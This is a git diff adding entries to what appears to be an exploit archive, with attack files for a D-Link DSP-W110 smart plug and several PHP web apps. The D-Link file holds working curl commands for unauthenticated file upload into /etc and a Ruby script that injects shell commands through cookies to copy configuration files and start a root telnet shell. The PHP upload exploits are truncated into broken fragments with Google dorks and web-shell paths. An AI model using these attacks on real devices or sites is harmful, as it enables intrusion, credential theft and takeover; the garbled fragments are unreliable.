diff --git a/files.csv b/files.csv
index 618b90a6e..190ae5b8f 100755
--- a/files.csv
+++ b/files.csv
@@ -33793,3 +33793,9 @@ id,file,description,date,author,platform,type,port
37447,platforms/asp/webapps/37447.txt,"C2Box 4.0.0(r19171) - CSRF Vulnerability",2015-06-30,"Wissam Bashour",asp,webapps,0
37448,platforms/multiple/remote/37448.rb,"Adobe Flash Player Drawing Fill Shader Memory Corruption",2015-06-30,metasploit,multiple,remote,0
37449,platforms/hardware/webapps/37449.txt,"Polycom RealPresence Resource Manager < 8.4 - Multiple Vulnerabilities",2015-06-30,"SEC Consult",hardware,webapps,0
+37450,platforms/php/webapps/37450.txt,"Amazon S3 Uploadify Script 'uploadify.php' Arbitrary File Upload Vulnerability",2012-06-23,"Sammy FORGIT",php,webapps,0
+37451,platforms/php/webapps/37451.txt,"SilverStripe Pixlr Image Editor 'upload.php' Arbitrary File Upload Vulnerability",2012-06-23,"Sammy FORGIT",php,webapps,0
+37452,platforms/php/webapps/37452.txt,"WordPress Flip Book 'php.php' Arbitrary File Upload Vulnerability",2012-06-23,"Sammy FORGIT",php,webapps,0
+37453,platforms/php/webapps/37453.php,"Drupal Drag & Drop Gallery 'upload.php' Arbitrary File Upload Vulnerability",2012-06-25,"Sammy FORGIT",php,webapps,0
+37454,platforms/hardware/webapps/37454.txt,"D-Link DSP-W w110 v1.05b01 - Multiple Vulnerabilities",2015-07-01,DNO,hardware,webapps,0
+37456,platforms/windows/dos/37456.html,"McAfee SiteAdvisor 3.7.2 (firefox) Use After Free PoC",2015-07-01,"Marcin Ressel",windows,dos,0
diff --git a/platforms/hardware/webapps/37454.txt b/platforms/hardware/webapps/37454.txt
new file mode 100755
index 000000000..8073dceac
--- /dev/null
+++ b/platforms/hardware/webapps/37454.txt
@@ -0,0 +1,168 @@
+# Exploit Title: D-Link DSP-W Arbitrary Arbitrary file upload
+# Date: 30/06/2015
+# Exploit Author: DNO
+# Vendor Homepage: [link]
+# Version: w110 v1.05b01
+# Tested on: linux
+# CVE : N/A
+
+========================================
+
+the only 'filtering' on this resources appears to be a sprintf()
+call which statically prefixes a submitted 'dev' argument with '/www'.
+However,
+if a HTTP request is performed without a 'dev' argument at all, the
+sprintf() call is never reached,
+and a fully-qualified path can be provided in the 'path' parameter -
+bypassing the upload path restriction.
+
+***************
+# Upload arbitrary files to the device.
+echo 'Some String' > test.txt
+curl \
+ -X POST \
+ -i \
+ -F name=@test.txt \
+ --http1.0 \
+ '192.168.1.3/web_cgi.cgi?&request=UploadFile&path=/etc/'
+
+ ========================================
+
+# Exploit Title: D-Link DSP-W Diagnostic Information " Get info"
+# Date: 30/06/2015
+# Exploit Author: DNO
+# Version: w110 v1.05b01
+# Tested on: linux
+# CVE : N/A
+
+========================================
+Severity Level:
+===============
+High
+===============
+Patches made to lighttpd by the vendor of this device allows an attacker to
+query the device, without authentication, for the following information:
+
+# Current WLAN SSIDs
+# Current WLAN channels
+# LAN and WAN MAC addressing
+# Current firmware version information
+# Hardware version information
+
+Although not sensitive information, it may allow for identification of
+devices running vulnerable firmware versions.
+
+=========================================
+# Information query.
+curl \
+192.168.1.3/mplist.txt
+
+========================================
+#ruby poc
+----
+
+# DSP-W110-Lighttpd PoC.
+
+require 'pp'
+require 'optparse'
+require 'restclient'
+
+# Set defaults and parse command line arguments
+options = {}
+
+options[:addr] = "192.168.0.60"
+options[:port] = 80
+
+OptionParser.new do |option|
+
+option.on("--address [ADDRESS]", "Destination hostname or IP") do |a|
+options[:addr] = a
+end
+
+option.on("--port [PORT]", "Destination TCP port") do |p|
+options[:port] = p
+end
+
+option.parse!
+
+end
+
+# Define which actions we will be using.
+actions = [
+{
+:name => "Get device information",
+:call => "txt_parser",
+:path => "mplist.txt",
+},
+{
+:name => "Snatch configuration",
+:call => "noop",
+:path => "HNAP1",
+:cookies => { :cookie => "`cp /etc/co* /www/`" }
+},
+{
+:name => "Fetch configuration",
+:call => "conf_writer",
+:path => "config.sqlite",
+},
+{
+:name => "Enable telnet (root)",
+:call => "noop",
+:path => "HNAP1",
+:cookies => { :cookie => "`telnetd -l/bin/sh`" }
+}
+]
+
+def noop(val)
+return
+end
+
+def txt_parser(txt)
+txt.split(/\r?\n/).each do |line|
+puts " #{line}"
+end
+end
+
+def conf_writer(txt)
+begin
+f = File.open('./config.sqlite', 'wb')
+rescue => e
+puts "[!] Failed to open config.sqlite for writing #{e.message}"
+end
+f.write(txt)
+f.close
+puts "[*] Configuration fetched into 'config.sqlite'"
+end
+
+# Iterate over all actions and attempt to execute.
+url = "http://#{options[:addr]}:#{options[:port]}"
+
+puts "[!] Attempting to extract information from #{url}"
+
+actions.each do |action|
+
+# Fire the request and ensure a 200 OKAY.
+begin
+response = RestClient.get(
+"#{url}/#{action[:path]}",
+{:cookies => action[:cookies]}
+)
+rescue
+puts "[!] Failed to query remote host."
+abort
+end
+
+if response.code != 200
+puts "[-] '#{action[:name]}' failed with response: #{response.code}"
+next
+end
+
+# Send to the processor.
+puts "[*] #{action[:name]} request succeeded."
+send(action[:call], response.body())
+
+end
+===================================
+
+ contact me FB : FB.COM/haker.dyno
+ Copyright © 2015 /DNO/
diff --git a/platforms/php/webapps/37450.txt b/platforms/php/webapps/37450.txt
new file mode 100755
index 000000000..bb2eaa7b7
--- /dev/null
+++ b/platforms/php/webapps/37450.txt
@@ -0,0 +1,64 @@
+source: http://www.securityfocus.com/bid/54170/info
+
+Amazon S3 Uploadify Script is prone to a vulnerability that lets attackers upload arbitrary files. The issue occurs because the application fails to adequately sanitize user-supplied input.
+
+An attacker can exploit this vulnerability to upload arbitrary code and execute it in the context of the web server process. This may facilitate unauthorized access or privilege escalation; other attacks are also possible.
+
+Amazon S3 Uploadify Script 1.01 is vulnerable; other versions may also be affected.
+
+1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
+0 _ __ __ __ 1
+1 /' \ __ /'__`\ /\ \__ /'__`\ 0
+0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1
+1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0
+0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
+1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
+0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1
+1 \ \____/ >> Exploit database separated by exploit 0
+0 \/___/ type (local, remote, DoS, etc.) 1
+1 1
+0 [+] Site : 1337day.com 0
+1 [+] Support e-mail : submit[at]1337day.com 1
+0 0
+1 ######################################### 1
+0 I'm Sammy FORGIT member from Inj3ct0r Team 1
+1 ######################################### 0
+0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
+##################################################
+# Description : uploadify-amazon-s3 Arbitrary File Upload Vulnerability
+# Version : 1.01
+# Link : http://code.google.com/p/uploadify-amazon-s3/
+# Software : http://code.google.com/p/uploadify-amazon-s3/downloads/detail?name=uploadify-amazon-s3-101.zip&can=2&q=
+# Date : 21-06-2012
+# Google Dork : inurl:/files/uploadify/ -google
+# Site : 1337day.com Inj3ct0r Exploit Database
+# Author : Sammy FORGIT - sam at opensyscom dot fr - http://www.opensyscom.fr
+##################################################
+
+
+Exploit :
+
+"@$uploadfile"));
+curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
+$postResult = curl_exec($ch);
+curl_close($ch);
+
+print "$postResult";
+
+?>
+
+Shell Access : http://www.exemple.com/files/uploadify/lo.php
+
+lo.php
+
+
+
+# Site : 1337day.com Inj3ct0r Exploit Database
diff --git a/platforms/php/webapps/37451.txt b/platforms/php/webapps/37451.txt
new file mode 100755
index 000000000..04b57fd6e
--- /dev/null
+++ b/platforms/php/webapps/37451.txt
@@ -0,0 +1,64 @@
+source: http://www.securityfocus.com/bid/54172/info
+
+Pixlr Image Editor is prone to a vulnerability that lets attackers upload arbitrary files. The issue occurs because the application fails to adequately sanitize user-supplied input.
+
+An attacker can exploit this vulnerability to upload arbitrary code and execute it in the context of the web server process. This may facilitate unauthorized access or privilege escalation; other attacks are also possible.
+
+Pixlr Image Editor 1.0.4 is vulnerable; other versions may also be affected.
+
+1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
+0 _ __ __ __ 1
+1 /' \ __ /'__`\ /\ \__ /'__`\ 0
+0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1
+1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0
+0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
+1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
+0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1
+1 \ \____/ >> Exploit database separated by exploit 0
+0 \/___/ type (local, remote, DoS, etc.) 1
+1 1
+0 [+] Site : 1337day.com 0
+1 [+] Support e-mail : submit[at]1337day.com 1
+0 0
+1 ######################################### 1
+0 I'm Sammy FORGIT member from Inj3ct0r Team 1
+1 ######################################### 0
+0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
+##################################################
+# Description : Silverstripe Modules - Pixlr Image Editor Arbitrary File Upload Vulnerability
+# Version : 1.0.4
+# Link : http://www.silverstripe.org/pixlr-image-editor-module/
+# Software : http://www.silverstripe.org/assets/modules/stable/svn.github.com-silverstripe-pixlr.git-r54.tar.gz
+# Date : 21-06-2012
+# Google Dork : not discover
+# Site : 1337day.com Inj3ct0r Exploit Database
+# Author : Sammy FORGIT - sam at opensyscom dot fr - http://www.opensyscom.fr
+##################################################
+
+
+Exploit :
+
+"@$uploadfile"));
+curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
+$postResult = curl_exec($ch);
+curl_close($ch);
+
+print "$postResult";
+
+?>
+
+Shell Access : http://www.exemple.com/silverstripe/pixlr/thirdparty/supa/data/lo.php
+
+lo.php
+
+
+
+# Site : 1337day.com Inj3ct0r Exploit Database
diff --git a/platforms/php/webapps/37452.txt b/platforms/php/webapps/37452.txt
new file mode 100755
index 000000000..3e6ee10f7
--- /dev/null
+++ b/platforms/php/webapps/37452.txt
@@ -0,0 +1,64 @@
+source: http://www.securityfocus.com/bid/54173/info
+
+Flip Book is prone to a vulnerability that lets attackers upload arbitrary files. The issue occurs because the application fails to adequately sanitize user-supplied input.
+
+An attacker can exploit this vulnerability to upload arbitrary code and execute it in the context of the web server process. This may facilitate unauthorized access or privilege escalation; other attacks are also possible.
+
+Flip Book 1.0 is vulnerable; other versions may also be affected.
+
+1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
+0 _ __ __ __ 1
+1 /' \ __ /'__`\ /\ \__ /'__`\ 0
+0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1
+1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0
+0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
+1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
+0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1
+1 \ \____/ >> Exploit database separated by exploit 0
+0 \/___/ type (local, remote, DoS, etc.) 1
+1 1
+0 [+] Site : 1337day.com 0
+1 [+] Support e-mail : submit[at]1337day.com 1
+0 0
+1 ######################################### 1
+0 I'm Sammy FORGIT member from Inj3ct0r Team 1
+1 ######################################### 0
+0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
+##################################################
+# Description : Wordpress Plugins - Flip Book Arbitrary File Upload Vulnerability
+# Version : 1.0
+# link : http://codecanyon.net/item/flip-book-wordpress-plugin/152641
+# Price : 30$
+# Date : 22-06-2012
+# Google Dork : inurl:/wp-content/plugins/flipbook/
+# Site : 1337day.com Inj3ct0r Exploit Database
+# Author : Sammy FORGIT - sam at opensyscom dot fr - http://www.opensyscom.fr
+##################################################
+
+
+Exploit :
+
+"@$uploadfile"));
+curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
+$postResult = curl_exec($ch);
+curl_close($ch);
+
+print "$postResult";
+
+?>
+
+Shell Access : http://www.exemple.com/wordpress/wp-includes/fb-images/lo.php
+
+lo.php
+
+
+
+# Site : 1337day.com Inj3ct0r Exploit Database
diff --git a/platforms/php/webapps/37453.php b/platforms/php/webapps/37453.php
new file mode 100755
index 000000000..a84d35972
--- /dev/null
+++ b/platforms/php/webapps/37453.php
@@ -0,0 +1,24 @@
+source: http://www.securityfocus.com/bid/54179/info
+
+Drag & Drop Gallery is prone to a vulnerability that lets attackers upload arbitrary files. The issue occurs because the application fails to adequately sanitize user-supplied input.
+
+An attacker can exploit this vulnerability to upload arbitrary code and execute it in the context of the web server process. This may facilitate unauthorized access or privilege escalation; other attacks are also possible.
+
+Drag & Drop Gallery 6.X-1.5 is vulnerable; other versions may also be affected.
+
+"@$uploadfile",
+ 'user_file[1]'=>"@$uploadfile2"));
+curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
+$postResult = curl_exec($ch);
+curl_close($ch);
+
+print "$postResult";
+
+?>
diff --git a/platforms/windows/dos/37456.html b/platforms/windows/dos/37456.html
new file mode 100755
index 000000000..ac3a0c2b3
--- /dev/null
+++ b/platforms/windows/dos/37456.html
@@ -0,0 +1,100 @@
+
+
+
+
+
+ McAfee SiteAdvisor 3.7.2 for firefox Use After Free Poc
+
+
+
+
+
+